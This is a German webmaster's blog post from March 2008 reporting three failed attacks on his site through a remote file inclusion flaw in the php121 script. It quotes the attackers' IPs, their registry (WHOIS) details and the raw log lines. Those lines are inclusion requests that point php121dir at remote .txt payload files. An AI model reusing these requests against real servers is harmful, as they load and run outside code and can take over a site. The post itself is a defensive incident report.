Samstag, 29. März 2008

Angriff am 17.03.08

Am 17.03.08 kamen dann die nächsten Idioten (Hacker) mit ihren amateurhaften Angriffsversuchen.


Diesmal versuchten Sie es über eine bekannte Sicherheitslücke eines PHP-Scripts (php121), naja, man hat ja mal was von gehört. Meine Meinung ist, diese Amateure starten irgendein Tool aber haben gar keine Ahnung, was sie da eigentlich tun, denn den Button eines Hackertools kann ja jeder Idiot drücken.

Warnung!!! Kommen Sie bitte nicht auf die Idee, durch Ersetzen von %3A%2F%2F und %2 durch die entsprechenden Zeichen, die URL´s aufzurufen, die als Sprungbrett verwendet wurden, es verbirgt sich evtl. immer noch schadhafter Code dahinter!

Der erste Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 165.138.51.197 seine Spur hinterlies, kam über folgenden Provider:

OrgName: Indiana Department of Education
OrgID: IDE-10
Address: Room 229
Address: State House
City: Indianapolis
NetRange: 165.138.0.0 - 165.138.255.255

Hier das Protokoll:

17.03.08, 15:49:32, 165.138.51.197, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://nkdb.org//AsaMall/makeup/id.txt??
17.03.08, 15:49:34, 165.138.51.197, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://revelation-divine.net/backup/id.txt??

Der zweite Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 202.181.99.83 seine Spur hinterlies, kam über folgenden Provider:

inetnum:      202.181.96.0 - 202.181.111.255
netname:      SAKURA
descr:        SAKURA Internet Inc.
descr:        1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan
country:      JP

Hier das Protokoll:

17.03.08, 16:34:43, 202.181.99.83,
/index.php?page=services//osData/php121/php121db.php?
php121dir=http://contactcraze.com/cmd-asc.txt??

Der dritte Versuch am 17.03.08

Der Amateur, der hier mittels seiner IP 86.197.68.38 seine Spur hinterlies, kam über folgenden Provider:

inetnum: 86.197.68.0 - 86.197.68.255
address: FRANCE TELECOM/SCR
netname: IP2000-ADSL-BAS
descr: BSNIC152 Nice Bloc 1
country: FR

Hier das Protokoll:

17.03.08, 19:08:44, 86.197.68.38, /index.php?page=services//osData/php121/php121db.php?
php121dir=http://www.germ2.com/www/z.txt???

Auch hier hat dieser Amateure keinen Schaden angerichtet, jedoch, schon der Versuch ist strafbar! Über so viel Dummheit, kann man echt nur grinsen. :-)

Viele Grüsse

Der Webmaster

Eingestellt von Werner Modes um 15:58
Labels: , , , , , , , ,

Keine Kommentare:

Kommentar veröffentlichen

Abonnieren Kommentare zum Post (Atom)